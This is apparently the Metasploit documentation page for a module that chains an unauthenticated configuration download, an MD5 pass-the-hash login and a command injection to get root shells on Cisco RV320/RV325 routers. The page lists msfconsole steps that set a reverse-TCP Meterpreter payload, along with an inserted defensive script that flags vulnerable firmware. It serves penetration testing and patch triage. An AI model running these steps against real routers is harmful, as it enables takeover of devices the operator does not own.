Path: blob/master/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md
## Introduction
This module chains two vulnerabilities to achieve effectively unauthenticated remote code execution on RV320 and RV325 routers.
The module will perform the following steps:
First, the module downloads the router configuration. It then extracts the MD5 password hash of the web interface user. The login accepts the MD5 hash directly in place of the plaintext password, so with the hash alone the module authenticates to the router's web interface and obtains a valid authentication cookie.

In the second step, the module uses that authentication cookie to send an authenticated request to the web interface which triggers a command injection vulnerability. The injection is limited to roughly 50 characters, so the module runs a web server to stage a shell payload for the router's MIPS64 architecture. Depending on the payload chosen, the module yields a shell or a Meterpreter session.
## Vulnerable Application

Cisco Small Business Routers RV320 and RV325 with firmware versions between 1.4.2.15 and 1.4.2.20.

Link to vulnerable firmware version: https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20?i=!pp

Links to advisories:

- Part 1 of the exploit (configuration download): https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export
- Part 2 of the exploit (command injection in web interface): https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection
- Advisories by vendor: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info and https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
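A defender-side triage helper, added here as an example and not part of the module or its documentation: it checks an inventory of RV320/RV325 devices against the affected firmware range given above (1.4.2.15 through 1.4.2.20, the latter being the release the firmware link points to; the range is assumed inclusive at both ends). The hostnames and versions in the sample inventory are constructed.

```python
# Triage helper (added example): flag RV320/RV325 devices whose firmware lies
# in the affected range 1.4.2.15 .. 1.4.2.20 (assumed inclusive at both ends).

AFFECTED_MODELS = {"RV320", "RV325"}
AFFECTED_MIN = (1, 4, 2, 15)  # lowest affected release named in the doc
AFFECTED_MAX = (1, 4, 2, 20)  # release the doc links as the vulnerable firmware


def parse_version(text: str) -> tuple:
    """Turn a dotted firmware string such as '1.4.2.17' into a comparable tuple."""
    parts = text.strip().split(".")
    # A malformed string raises rather than being silently treated as patched.
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised firmware version: {text!r}")
    return tuple(int(p) for p in parts)


def is_affected(model: str, firmware: str) -> bool:
    """True if the model and firmware fall inside the affected range."""
    if model.upper() not in AFFECTED_MODELS:
        return False
    return AFFECTED_MIN <= parse_version(firmware) <= AFFECTED_MAX


def triage(inventory):
    """Return hostnames that need patching or management-interface lockdown."""
    flagged = []
    for host, model, firmware in inventory:
        try:
            if is_affected(model, firmware):
                flagged.append(host)
        except ValueError:
            # Unknown version: must not be assumed safe, so report it as well.
            flagged.append(host)
    return flagged


# Constructed sample inventory: (hostname, model, firmware)
SAMPLE_INVENTORY = [
    ("branch-gw-1", "RV320", "1.4.2.17"),  # inside the range
    ("branch-gw-2", "RV325", "1.4.2.22"),  # newer than the range
    ("branch-gw-3", "RV320", "1.4.2.15"),  # on the lower bound
    ("branch-gw-4", "RV042", "1.4.2.18"),  # different model
    ("branch-gw-5", "RV325", "unknown"),   # unparseable, flagged anyway
]

if __name__ == "__main__":
    print(triage(SAMPLE_INVENTORY))  # ['branch-gw-1', 'branch-gw-3', 'branch-gw-5']
```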
## Options

**RHOSTS**

The remote vulnerable system.

**RPORT**

The TCP port of the HTTP/HTTPS management web interface.

**USE_SSL**

Controls whether the remote management web interface is reached via HTTPS. Set to `false` for HTTP and `true` for HTTPS.

**PAYLOAD**

The Metasploit payload to stage. It must be a MIPS64 payload; set the payload's own options accordingly.

**SRVHOST**

The module stages the payload via a web server; this is the IP of the interface that web server binds to. It can be left at the default of 0.0.0.0 to listen on all interfaces.

**HTTPDelay**

How long the module waits for the router's incoming HTTP connection to the HTTP stager.
## Verification Steps

1. Have an exploitable RV320 or RV325 router (example IP: 192.168.1.1).
2. Start `msfconsole`.
3. Do: `use exploit/linux/http/cisco_rv32x_rce`
4. Do: `set RHOSTS 192.168.1.1`
5. Do: `set payload linux/mips64/meterpreter_reverse_tcp` (set the MIPS64 payload you want to use)
6. Do: `set LHOST 192.168.1.2` (set your own IP here; example: 192.168.1.2)
7. Do: `set RPORT 8007` (set the remote port on which the router's web interface is accessible)
8. Do: `run`
9. This gives you a privileged (uid=0) shell, or, in this example, a Meterpreter session.
## Scenarios

Exploiting a vulnerable RV320 router with a publicly accessible HTTPS web interface on TCP port 443:

Demo example output for the module: